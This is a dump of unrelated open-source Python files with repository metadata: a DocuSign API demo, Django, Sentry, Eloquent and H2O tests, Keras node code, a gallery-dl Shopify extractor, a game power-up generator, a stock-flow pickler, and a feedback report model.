value = raw_input('{description} (default: "{default}"): '.format(
default=default, description=description))
if not value:
return default
else:
return value
# Get configuration from environment or prompt the user...
root_url = prompt(
'DOCUSIGN_ROOT_URL',
'DocuSign API URL',
'https://demo.docusign.net/restapi/v2')
username = prompt(
'DOCUSIGN_USERNAME',
'DocuSign API username',
'')
password = prompt(
'DOCUSIGN_PASSWORD',
'DocuSign API password',
'')
integrator_key = prompt(
'DOCUSIGN_INTEGRATOR_KEY',
'DocuSign API integrator key',
'')
callback_url = prompt(
'DOCUSIGN_TEST_CALLBACK_URL',
'Envelope callback URL',
'')
signer_return_url = prompt(
'DOCUSIGN_TEST_SIGNER_RETURN_URL',
'Signer return URL',
'')
# Create a client.
client = pydocusign.DocuSignClient(
root_url=root_url,
username=username,
password=password,
integrator_key=integrator_key,
)
# Login. Updates API URLs in client.
print("1. GET /login_information")
login_information = client.login_information()
print(" Received data: {data}".format(data=login_information))
# Prepare list of signers. Ordering matters.
signers = [
pydocusign.Signer(
email='[email protected]',
name=u'Jean Français',
recipientId=1,
clientUserId=str(uuid.uuid4()), # Something unique in your database.
tabs=[
pydocusign.SignHereTab(
documentId=1,
pageNumber=1,
xPosition=100,
yPosition=100,
),
],
emailSubject='Voici un sujet',
emailBody='Voici un message',
supportedLanguage='fr',
),
pydocusign.Signer(
email='[email protected]',
name=u'Paul English',
recipientId=2,
clientUserId=str(uuid.uuid4()), # Something unique in your database.
tabs=[], # No tabs means user places tabs himself in DocuSign UI.
emailSubject='Here is a subject',
emailBody='Here is a message',
supportedLanguage='en',
),
]
# Create envelope with embedded signing.
print("2. POST {account}/envelopes")
event_notification = pydocusign.EventNotification(
url=callback_url,
)
document_path = os.path.join(fixtures_dir(), 'test.pdf')
document_2_path = os.path.join(fixtures_dir(), 'test2.pdf')
with open(document_path, 'rb') as pdf, open(document_2_path, 'rb') as pdf_2:
envelope = pydocusign.Envelope(
documents=[
pydocusign.Document(
name='document.pdf',
documentId=1,
data=pdf,
),
pydocusign.Document(
name='document_2.pdf',
documentId=2,
data=pdf_2,
),
],
emailSubject='This is the subject',
emailBlurb='This is the body',
eventNotification=event_notification,
status=pydocusign.Envelope.STATUS_SENT,
recipients=signers,
)
client.create_envelope_from_documents(envelope)
print(" Received envelopeId {id}".format(id=envelope.envelopeId))
# Update recipient list of envelope: fetch envelope's ``UserId`` from DocuSign.
print("3. GET {account}/envelopes/{envelopeId}/recipients")
envelope.get_recipients()
print(" Received UserId for recipient 0: {0}".format(
envelope.recipients[0].userId))
print(" Received UserId for recipient 1: {0}".format(
envelope.recipients[1].userId))
# Retrieve embedded signing for first recipient.
print("4. Get DocuSign Recipient View")
signing_url = envelope.post_recipient_view(
envelope.recipients[0],
returnUrl=signer_return_url)
print(" Received signing URL for recipient 0: {0}".format(signing_url))
signing_url = envelope.post_recipient_view(
envelope.recipients[1],
returnUrl=signer_return_url)
print(" Received signing URL for recipient 1: {0}".format(signing_url))
# Download signature documents.
print("5. List signature documents.")
document_list = envelope.get_document_list()
print(" Received document list: {0}".format(document_list))
print("6. Download documents from DocuSign.")
for signed_document in document_list:
document = envelope.get_document(signed_document['documentId'])
document_sha = hashlib.sha1(document.read()).hexdigest()
print(" Document SHA1: {0}".format(document_sha))
print("7. Download signature certificate from DocuSign.")
document = envelope.get_certificate()
document_sha = hashlib.sha1(document.read()).hexdigest()
print(" Certificate SHA1: {0}".format(document_sha))
| bsd-3-clause | 5,006,633,623,284,871,000 | 28.936047 | 79 | 0.655661 | false | 3.688395 | false | false | false |
elky/django | tests/update/models.py | 79 | 1083 | """
Tests for the update() queryset method that allows in-place, multi-object
updates.
"""
from django.db import models
class DataPoint(models.Model):
name = models.CharField(max_length=20)
value = models.CharField(max_length=20)
another_value = models.CharField(max_length=20, blank=True)
def __str__(self):
return self.name
class RelatedPoint(models.Model):
name = models.CharField(max_length=20)
data = models.ForeignKey(DataPoint, models.CASCADE)
def __str__(self):
return self.name
class A(models.Model):
x = models.IntegerField(default=10)
class B(models.Model):
a = models.ForeignKey(A, models.CASCADE)
y = models.IntegerField(default=10)
class C(models.Model):
y = models.IntegerField(default=10)
class D(C):
a = models.ForeignKey(A, models.CASCADE)
class Foo(models.Model):
target = models.CharField(max_length=10, unique=True)
class Bar(models.Model):
foo = models.ForeignKey(Foo, models.CASCADE, to_field='target')
m2m_foo = models.ManyToManyField(Foo, related_name='m2m_foo')
| bsd-3-clause | 8,444,251,057,236,665,000 | 21.102041 | 73 | 0.692521 | false | 3.40566 | false | false | false |
mvaled/sentry | tests/sentry/api/serializers/test_alert_rule.py | 1 | 1670 | # -*- coding: utf-8 -*-
from __future__ import absolute_import
import six
from sentry.api.serializers import serialize
from sentry.incidents.logic import create_alert_rule
from sentry.incidents.models import AlertRuleThresholdType
from sentry.snuba.models import QueryAggregations
from sentry.testutils import TestCase
class AlertRuleSerializerTest(TestCase):
def test_simple(self):
alert_rule = create_alert_rule(
self.organization,
[self.project],
"hello",
AlertRuleThresholdType.ABOVE,
"level:error",
QueryAggregations.TOTAL,
10,
1000,
400,
1,
)
result = serialize(alert_rule)
assert result["id"] == six.text_type(alert_rule.id)
assert result["projectId"] == six.text_type(
alert_rule.query_subscriptions.first().project_id
)
assert result["name"] == alert_rule.name
assert result["thresholdType"] == alert_rule.threshold_type
assert result["dataset"] == alert_rule.dataset
assert result["query"] == alert_rule.query
assert result["aggregation"] == alert_rule.aggregation
assert result["timeWindow"] == alert_rule.time_window
assert result["resolution"] == alert_rule.resolution
assert result["alertThreshold"] == alert_rule.alert_threshold
assert result["resolveThreshold"] == alert_rule.resolve_threshold
assert result["thresholdPeriod"] == alert_rule.threshold_period
assert result["dateModified"] == alert_rule.date_modified
assert result["dateAdded"] == alert_rule.date_added
| bsd-3-clause | 8,378,937,955,324,917,000 | 36.111111 | 73 | 0.645509 | false | 4.348958 | false | false | false |
aam-at/tensorflow | tensorflow/python/keras/engine/node.py | 5 | 11372 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Contains the `Node` class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import json
import numpy as np
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.engine import keras_tensor
from tensorflow.python.keras.saving.saved_model import json_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util import nest
_CONSTANT_VALUE = '_CONSTANT_VALUE'
class Node(object):
"""A `Node` describes the connectivity between two layers.
Each time a layer is connected to some new input,
a node is added to `layer._inbound_nodes`.
Each time the output of a layer is used by another layer,
a node is added to `layer._outbound_nodes`.
Arguments:
layer: The Layer for the Layer.__call__ this node represents.
call_args: The positional arguments the Layer was called with.
call_kwargs: The keyword arguments the Layer was called with.
outputs: The outputs of the Layer.__call__
"""
def __init__(self,
layer,
call_args=None,
call_kwargs=None,
outputs=None):
call_args = [] if call_args is None else call_args
call_kwargs = {} if call_kwargs is None else call_kwargs
outputs = [] if outputs is None else outputs
self.layer = layer
self.is_input = not call_args and not call_kwargs
# These arguments are user-provided. Copy the structures here so that
# future user modifications do not affect the node's metadata.
# We copy using map_structure rather than python's shallow or deep copy,
# because the args can be data structures (so shallow copy is
# insufficient), but individual values might not support copy.copy
# or be too expensive to deep copy.
call_args = nest.map_structure(lambda t: t, call_args)
call_kwargs = nest.map_structure(lambda t: t, call_kwargs)
self.outputs = nest.map_structure(lambda t: t, outputs)
self.call_args = call_args
self.call_kwargs = call_kwargs
# Cached for performance.
self._flat_arguments = nest.flatten((self.call_args, self.call_kwargs))
# Used to avoid expensive `nest` operations in the most common case.
self._single_positional_tensor_passed = (not self.call_kwargs and len(
self.call_args) == 1 and tensor_util.is_tensor(self.call_args[0]))
if not keras_tensor.keras_tensors_enabled():
# Create TensorFlowOpLayers if needed.
for obj in self._flat_arguments:
if (isinstance(obj, ops.Tensor) and
base_layer_utils.needs_keras_history(
obj, ignore_call_context=True)):
base_layer_utils.create_keras_history(obj)
self._keras_inputs = []
self._keras_inputs_ids_and_indices = []
for i, ele in enumerate(self._flat_arguments):
if is_keras_tensor(ele):
self._keras_inputs.append(ele)
kt_id = str(id(ele))
kt_index = i
self._keras_inputs_ids_and_indices.append((kt_id, kt_index))
# Wire up Node to Layers.
self.layer._inbound_nodes.append(self)
for kt in self.keras_inputs:
inbound_layer = kt._keras_history.layer
if inbound_layer is not None: # `None` for `Input` tensors.
inbound_layer._outbound_nodes.append(self)
# Set metadata on outputs.
node_index = len(self.layer._inbound_nodes) - 1
for i, tensor in enumerate(nest.flatten(outputs)):
tensor._keras_history = KerasHistory(
layer=layer, node_index=node_index, tensor_index=i)
# Cached for performance.
self.flat_input_ids = [str(id(t)) for t in self._keras_inputs]
self.flat_output_ids = [str(id(t)) for t in nest.flatten(self.outputs)]
@property
def keras_inputs(self):
"""Tensors input to this node that can be traced back to a `keras.Input`."""
return self._keras_inputs
@property
def parent_nodes(self):
"""Returns all the `Node`s whose output this node immediately depends on."""
node_deps = []
for kt in self.keras_inputs:
layer = kt._keras_history.layer
node_index = kt._keras_history.node_index
if layer is not None: # `None` for `Input` tensors.
node_deps.append(layer._inbound_nodes[node_index])
return node_deps
def iterate_inbound(self):
"""Yields tuples representing the data inbound from other nodes.
Yields:
tuples like: (inbound_layer, node_index, tensor_index, tensor).
"""
for kt in self.keras_inputs:
keras_history = kt._keras_history
layer = keras_history.layer
node_index = keras_history.node_index
tensor_index = keras_history.tensor_index
yield layer, node_index, tensor_index, kt
def map_arguments(self, tensor_dict):
"""Maps Keras Tensors to computed Tensors using `tensor_dict`."""
if self._single_positional_tensor_passed:
# Performance optimization for most common case.
kt_id, _ = self._keras_inputs_ids_and_indices[0]
return (tensor_dict[kt_id].pop(),), {}
else:
flat_arguments = copy.copy(self._flat_arguments)
for kt_id, kt_index in self._keras_inputs_ids_and_indices:
flat_arguments[kt_index] = tensor_dict[kt_id].pop()
args, kwargs = nest.pack_sequence_as((self.call_args, self.call_kwargs),
flat_arguments)
return args, kwargs
def serialize(self, make_node_key, node_conversion_map):
"""Serializes `Node` for Functional API's `get_config`."""
# Serialization still special-cases first argument.
args, kwargs = self.call_args, self.call_kwargs
inputs, args, kwargs = self.layer._split_out_first_arg(args, kwargs)
# Treat everything other than first argument as a kwarg.
arguments = dict(zip(self.layer._call_fn_args[1:], args))
arguments.update(kwargs)
kwargs = arguments
def _serialize_keras_tensor(t):
"""Serializes a single Tensor passed to `call`."""
if hasattr(t, '_keras_history'):
kh = t._keras_history
node_index = kh.node_index
node_key = make_node_key(kh.layer.name, node_index)
new_node_index = node_conversion_map.get(node_key, 0)
return [kh.layer.name, new_node_index, kh.tensor_index]
if isinstance(t, np.ndarray):
return t.tolist()
if isinstance(t, ops.Tensor):
return backend.get_value(t).tolist()
return t
kwargs = nest.map_structure(_serialize_keras_tensor, kwargs)
try:
json.dumps(kwargs, default=json_utils.get_json_type)
except TypeError:
kwarg_types = nest.map_structure(type, kwargs)
raise TypeError('Layer ' + self.layer.name +
' was passed non-JSON-serializable arguments. ' +
'Arguments had types: ' +
str(kwarg_types) + '. They cannot be serialized out '
'when saving the model.')
# `kwargs` is added to each Tensor in the first arg. This should be
# changed in a future version of the serialization format.
def serialize_first_arg_tensor(t):
if is_keras_tensor(t):
kh = t._keras_history
node_index = kh.node_index
node_key = make_node_key(kh.layer.name, node_index)
new_node_index = node_conversion_map.get(node_key, 0)
data = [kh.layer.name, new_node_index, kh.tensor_index, kwargs]
else:
# If an element in the first call argument did not originate as a
# keras tensor and is a constant value, we save it using the format
# ['_CONSTANT_VALUE', -1, serializaed_tensor_or_python_constant]
# (potentially including serialized kwargs in an optional 4th argument
data = [_CONSTANT_VALUE, -1, _serialize_keras_tensor(t), kwargs]
return tf_utils.ListWrapper(data)
data = nest.map_structure(serialize_first_arg_tensor, inputs)
if (not nest.is_nested(data) and
not self.layer._preserve_input_structure_in_config):
data = [data]
data = tf_utils.convert_inner_node_data(data)
return data
#############################################################
# Properties for Backwards compatibility.
# These only check the first input argument
# As nodes are internal, they may be removed in the future.
#############################################################
@property
def input_tensors(self):
if self.is_input:
return [self.outputs] # Used in `Layer.input`.
return self.call_args[0]
@property
def output_tensors(self):
if self.is_input:
return [self.outputs] # Used in `Layer.input`.
return self.outputs
@property
def input_shapes(self):
input_shapes = nest.map_structure(backend.int_shape, self.input_tensors)
if len(input_shapes) == 1 and not self.is_input:
return input_shapes[0]
return input_shapes
@property
def output_shapes(self):
return nest.map_structure(backend.int_shape, self.output_tensors)
@property
def outbound_layer(self):
return self.layer
@property
def inbound_layers(self):
if self.is_input:
return []
inbound_layers = nest.map_structure(lambda t: t._keras_history.layer,
self.call_args[0])
return inbound_layers
class KerasHistory(
collections.namedtuple('KerasHistory',
['layer', 'node_index', 'tensor_index'])):
"""Tracks the Layer call that created a Tensor, for Keras Graph Networks.
During construction of Keras Graph Networks, this metadata is added to
each Tensor produced as the output of a Layer, starting with an
`InputLayer`. This allows Keras to track how each Tensor was produced, and
this information is later retraced by the `keras.engine.Network` class to
reconstruct the Keras Graph Network.
Attributes:
layer: The Layer that produced the Tensor.
node_index: The specific call to the Layer that produced this Tensor. Layers
can be called multiple times in order to share weights. A new node is
created every time a Layer is called.
tensor_index: The output index for this Tensor. Always zero if the Layer
that produced this Tensor only has one output. Nested structures of
Tensors are deterministically assigned an index via `nest.flatten`.
"""
# Added to maintain memory and performance characteristics of `namedtuple`
# while subclassing.
__slots__ = ()
def is_keras_tensor(obj):
return hasattr(obj, '_keras_history')
| apache-2.0 | -5,113,593,819,068,058,000 | 37.945205 | 80 | 0.66268 | false | 3.901201 | false | false | false |
mikf/gallery-dl | gallery_dl/extractor/shopify.py | 1 | 4365 | # -*- coding: utf-8 -*-
# Copyright 2019-2021 Mike Fährmann
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
"""Extractors for Shopify instances"""
from .common import BaseExtractor, Message
from .. import text
import re
class ShopifyExtractor(BaseExtractor):
"""Base class for Shopify extractors"""
basecategory = "shopify"
filename_fmt = "{product[title]}_{num:>02}_{id}.{extension}"
archive_fmt = "{id}"
def __init__(self, match):
BaseExtractor.__init__(self, match)
self.item_url = self.root + match.group(match.lastindex)
def items(self):
data = self.metadata()
yield Message.Directory, data
headers = {"X-Requested-With": "XMLHttpRequest"}
for url in self.products():
response = self.request(
url + ".json", headers=headers, fatal=False)
if response.status_code >= 400:
self.log.warning('Skipping %s ("%s: %s")',
url, response.status_code, response.reason)
continue
product = response.json()["product"]
del product["image"]
for num, image in enumerate(product.pop("images"), 1):
text.nameext_from_url(image["src"], image)
image.update(data)
image["product"] = product
image["num"] = num
yield Message.Url, image["src"], image
def metadata(self):
"""Return general metadata"""
return {}
def products(self):
"""Return an iterable with all relevant product URLs"""
BASE_PATTERN = ShopifyExtractor.update({
"fashionnova": {
"root": "https://www.fashionnova.com",
"pattern": r"(?:www\.)?fashionnova\.com",
},
"omgmiamiswimwear": {
"root": "https://www.omgmiamiswimwear.com"
},
})
class ShopifyCollectionExtractor(ShopifyExtractor):
"""Base class for collection extractors for Shopify based sites"""
subcategory = "collection"
directory_fmt = ("{category}", "{collection[title]}")
pattern = BASE_PATTERN + r"(/collections/[\w-]+)/?(?:$|[?#])"
test = (
("https://www.fashionnova.com/collections/mini-dresses", {
"range": "1-20",
"count": 20,
"archive": False,
}),
("https://www.fashionnova.com/collections/mini-dresses/?page=1"),
("https://www.fashionnova.com/collections/mini-dresses#1"),
("https://www.omgmiamiswimwear.com/collections/fajas"),
)
def metadata(self):
return self.request(self.item_url + ".json").json()
def products(self):
params = {"page": 1}
fetch = True
last = None
for pattern in (
r"/collections/[\w-]+/products/[\w-]+",
r"href=[\"'](/products/[\w-]+)",
):
search_re = re.compile(pattern)
while True:
if fetch:
page = self.request(self.item_url, params=params).text
urls = search_re.findall(page)
if len(urls) < 3:
if last:
return
fetch = False
break
fetch = True
for path in urls:
if last == path:
continue
last = path
yield self.root + path
params["page"] += 1
class ShopifyProductExtractor(ShopifyExtractor):
"""Base class for product extractors for Shopify based sites"""
subcategory = "product"
directory_fmt = ("{category}", "Products")
pattern = BASE_PATTERN + r"((?:/collections/[\w-]+)?/products/[\w-]+)"
test = (
("https://www.fashionnova.com/products/essential-slide-red", {
"pattern": r"https?://cdn\d*\.shopify.com/",
"count": 3,
}),
("https://www.omgmiamiswimwear.com/products/la-medusa-maxi-dress", {
"pattern": r"https://cdn\.shopify\.com/s/files/1/1819/6171/",
"count": 5,
}),
("https://www.fashionnova.com/collections/flats/products/name"),
)
def products(self):
return (self.item_url,)
| gpl-2.0 | 6,708,945,724,042,438,000 | 31.325926 | 76 | 0.541934 | false | 3.952899 | false | false | false |
sdispater/eloquent | tests/migrations/test_migrator.py | 1 | 8071 | # -*- coding: utf-8 -*-
import os
import glob
from flexmock import flexmock, flexmock_teardown
from .. import EloquentTestCase
from eloquent.migrations import Migrator, DatabaseMigrationRepository, Migration
from eloquent import DatabaseManager
from eloquent.connections import Connection
class MigratorTestCase(EloquentTestCase):
def tearDown(self):
flexmock_teardown()
def test_migrations_are_run_up_when_outstanding_migrations_exist(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '2_bar.py'),
os.path.join(os.getcwd(), '1_foo.py'),
os.path.join(os.getcwd(), '3_baz.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)
migrator.get_repository().should_receive('log').once().with_args('2_bar', 1)
migrator.get_repository().should_receive('log').once().with_args('3_baz', 1)
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('up').once()
baz_mock = flexmock(MigrationStub())
baz_mock.should_receive('up').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)
migrator.run(os.getcwd())
def test_up_migration_can_be_pretended(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return({})
resolver = flexmock(DatabaseManager({}))
connection = flexmock(Connection(None))
connection.should_receive('pretend').replace_with(lambda callback: callback(None))
resolver.should_receive('connection').with_args(None).and_return(connection)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '2_bar.py'),
os.path.join(os.getcwd(), '1_foo.py'),
os.path.join(os.getcwd(), '3_baz.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('get_connection').once().and_return(None)
bar_mock.should_receive('up').once()
baz_mock = flexmock(MigrationStub())
baz_mock.should_receive('get_connection').once().and_return(None)
baz_mock.should_receive('up').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)
migrator.run(os.getcwd(), True)
def test_nothing_is_done_when_no_migrations_outstanding(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return(None)
resolver = flexmock(DatabaseManager({}))
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
g = flexmock(glob)
g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
os.path.join(os.getcwd(), '1_foo.py')
])
migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
migrator.run(os.getcwd())
def test_last_batch_of_migrations_can_be_rolled_back(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
foo_migration = MigrationStub('foo')
bar_migration = MigrationStub('bar')
migrator.get_repository().should_receive('get_last').once().and_return([
foo_migration,
bar_migration
])
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('down').once()
foo_mock = flexmock(MigrationStub())
foo_mock.should_receive('down').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)
migrator.get_repository().should_receive('delete').once().with_args(bar_migration)
migrator.get_repository().should_receive('delete').once().with_args(foo_migration)
migrator.rollback(os.getcwd())
def test_rollback_migration_can_be_pretended(self):
resolver_mock = flexmock(DatabaseManager)
resolver_mock.should_receive('connection').and_return({})
resolver = flexmock(DatabaseManager({}))
connection = flexmock(Connection(None))
connection.should_receive('pretend').replace_with(lambda callback: callback(None))
resolver.should_receive('connection').with_args(None).and_return(connection)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
foo_migration = MigrationStub('foo')
bar_migration = MigrationStub('bar')
migrator.get_repository().should_receive('get_last').once().and_return([
foo_migration,
bar_migration
])
bar_mock = flexmock(MigrationStub())
bar_mock.should_receive('down').once()
foo_mock = flexmock(MigrationStub())
foo_mock.should_receive('down').once()
migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock)
migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock)
migrator.rollback(os.getcwd(), True)
def test_nothing_is_rolled_back_when_nothing_in_repository(self):
resolver = flexmock(DatabaseManager)
resolver.should_receive('connection').and_return(None)
migrator = flexmock(
Migrator(
flexmock(
DatabaseMigrationRepository(
resolver,
'migrations'
)
),
resolver
)
)
migrator.get_repository().should_receive('get_last').once().and_return([])
migrator.rollback(os.getcwd())
class MigrationStub(Migration):
def __init__(self, migration=None):
self.migration = migration
def up(self):
pass
def down(self):
pass
def __getitem__(self, item):
return self.migration
| mit | 5,210,899,352,711,786,000 | 35.192825 | 103 | 0.566844 | false | 4.147482 | true | false | false |
Superzer0/pyRiverRaid | objects/mobs/generators/powerup_generators.py | 1 | 2120 | import random
from objects.globals.gamesettings import GameSettings
from objects.powerup import PowerUp
class PowerUpGenerator:
"""Base class for power ups generators"""
def __init__(self, player, imgResources, all_sprites, powerups):
self.player = player
self.imgResources = imgResources
self.all_sprites = all_sprites
self.power_ups = powerups
def generate(self):
"""base dummy implementation for genrating power up"""
pass
class ShieldGenerator(PowerUpGenerator):
"""Generates random shield"""
def generate(self):
"""Method used for generating shield, if created shield added to sprite context"""
if self.player.shield < 50 and random.random() > GameSettings.SHIELD_PROP:
shield = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_SHIELD)
self.power_ups.add(shield)
self.all_sprites.add(shield)
class GunGenerator(PowerUpGenerator):
"""Generates random gun"""
def generate(self):
"""Method used for generating gun, if created gun added to sprite context"""
if random.random() > GameSettings.GUN_PROP:
gun = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_GUN)
self.power_ups.add(gun)
self.all_sprites.add(gun)
class FuelGenerator(PowerUpGenerator):
"""Generates random fuel pack"""
def generate(self):
"""Method used for generating fuel, if created fuel added to sprite context"""
count = len(list(filter(lambda x: x.type == self.imgResources.POWER_UP_FUEL, self.power_ups)))
if count < 2 and self.player.fuel < 80 and random.random() > GameSettings.FUEL_PROP:
fuel = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups,
self.imgResources.POWER_UP_FUEL)
self.power_ups.add(fuel)
self.all_sprites.add(fuel)
| mit | -8,526,851,652,054,712,000 | 39.769231 | 109 | 0.64717 | false | 3.918669 | false | false | false |
sein-tao/StockAnalysis | dump_flow.py | 1 | 2209 | # -*- coding: utf-8 -*-
"""
Dump tdx_flow files to pickle
Created on Sun Jul 26 18:51:24 2015
@author: Sein Tao
@email: [email protected]
"""
# import sys
# sys.path.append("..")
import os
import pickle
import datetime
import dateutil.relativedelta
from parse_flow import parse_tdx_flow, FlowRecord
datadir="D:\Personal\Finnance\Stock\Flow"
def dump_flow(month_start, month_end, outfile, datadir=datadir):
"""Dump tdx_flow files to pickle"""
str2date = lambda x: datetime.datetime.strptime(x, '%Y%m')
date2str = lambda x: datetime.datetime.strftime(x, '%Y%m')
one_month = dateutil.relativedelta.relativedelta(months=1)
start, end = str2date(month_start), str2date(month_end)
if start > end:
raise ValueError("start month should be less than end month")
recs = []
current = start
while current <= end:
file = os.path.join(datadir, 'flow'+date2str(current)+".xls")
recs.extend(parse_tdx_flow(file))
current += one_month
with open(outfile, 'wb') as fh:
pickle.dump(recs, fh)
def dump2txt(dump_file, out_file):
ih = open(dump_file, 'rb')
data = pickle.load(ih)
ih.close()
oh = open(out_file, 'w')
oh.write("#" + "\t".join(FlowRecord.Raw._fields) + "\n")
for rec in data:
oh.write("\t".join(rec.raw))
oh.write("\n")
oh.close()
def load_flow(dump_file):
return pickle.load(open(dump_file, 'rb'))
if __name__ == '__main__':
data_file = os.path.join(datadir, '2014.pickle')
#dump_flow('201405', '201412', data_file)
#data = pickle.load(open(data_file, 'rb'))
#dump2txt(data_file, os.path.join(datadir,'2014.txt'))
import unittest
class Test(unittest.TestCase):
def setUp(self):
self.ref = os.path.join(datadir, '2014.pickle')
self.tmp = "tmp/flow.pickle"
def test_dump(self):
import filecmp
dump_flow('201405', '201412', self.tmp)
self.assertTrue(filecmp.cmp(self.ref, self.tmp))
def test_load(self):
self.assertEqual(load_flow(self.ref), load_flow(self.tmp))
from util import runTestCase
runTestCase(Test)
| gpl-2.0 | -5,176,967,298,923,372,000 | 29.694444 | 70 | 0.6134 | false | 3.215429 | true | false | false |
codeforamerica/mdc-feedback | feedback/reports/models.py | 1 | 2121 | # -*- coding: utf-8 -*-
import arrow
from flask import (
render_template, current_app,
url_for
)
from feedback.database import (
Column, db, Model
)
from feedback.utils import send_email
class Monthly(Model):
''' The monthly report model - this only contains
one field: a string of e-mails separated by commas
if necessary.
'''
__tablename__ = 'monthly-report'
id = Column(db.Integer, primary_key=True, index=True)
email_list = Column(db.String(200), nullable=True)
def __repr__(self):
return '<Monthly(id:{0}, emails:{1})>'.format(
self.id,
self.email_list)
def send_report(self):
''' From an instance of the Monthly model, send
out an e-mail saying that this months monthly
report is ready. This gets pinged from a server
task every month through Heroku. In theory.
'''
if self.email_list is None:
subj = 'Permitting Inspection Center Monthly Status Report'
current_app.logger.info(
'NO-EMAIL-ADDRESS | Subject: {}'.format(subj))
else:
subj = 'Permitting Inspection Center Monthly Status Report - {}'
from_email = current_app.config.get('ADMIN_EMAIL')
last_month = arrow.utcnow().replace(months=-1)
date_start, date_end = last_month.span('month')
date_header = date_start.format('MMMM, YYYY')
year = last_month.format('YYYY')
month = last_month.format('MM')
report = url_for(
'reports.overview', _external=True,
year=year, month=month)
send_email(
subj.format(date_header),
from_email,
self.email_list,
render_template('email/monthly_notification.txt',
date_header=date_header,
report=report),
render_template('email/monthly_notification.html',
date_header=date_header,
report=report))
| mit | 11,070,799,657,152,250 | 33.209677 | 76 | 0.554455 | false | 4.2 | false | false | false |
mathemage/h2o-3 | h2o-py/tests/testdir_apis/H2O_Module/pyunit_h2oinit.py | 2 | 2140 | from __future__ import print_function
import sys
sys.path.insert(1,"../../../")
from tests import pyunit_utils
import h2o
from h2o.utils.typechecks import assert_is_type
from h2o.exceptions import H2OConnectionError
def h2oinit():
"""
Python API test: h2o.init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None,
cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True,
max_mem_size=None, min_mem_size=None, strict_version_check=None, **kwargs)
"""
start_h2o = False
strict_version_check = False
print("Testing h2o.init() command...")
try:
h2o.init(start_h2o=start_h2o)
print("h2o.init() command works!")
except Exception as e: # some errors are okay like version mismatch
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
try:
h2o.init(strict_version_check=strict_version_check, start_h2o=start_h2o)
except Exception as e:
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
# try to join a cluster and test out various command arguments
ipS = "127.16.2.27"
portS = "54321"
nthread = 2
max_mem_size=10
min_mem_size=3
try:
h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, min_mem_size=min_mem_size,
start_h2o=start_h2o, strict_version_check=strict_version_check)
print("Command h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, "
"min_mem_size=min_mem_size,start_h2o=start_h2o, strict_version_check=strict_version_check) works!")
except Exception as e: # make sure correct error message is received
print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0]))
assert_is_type(e, H2OConnectionError)
if __name__ == "__main__":
pyunit_utils.standalone_test(h2oinit)
else:
h2oinit()
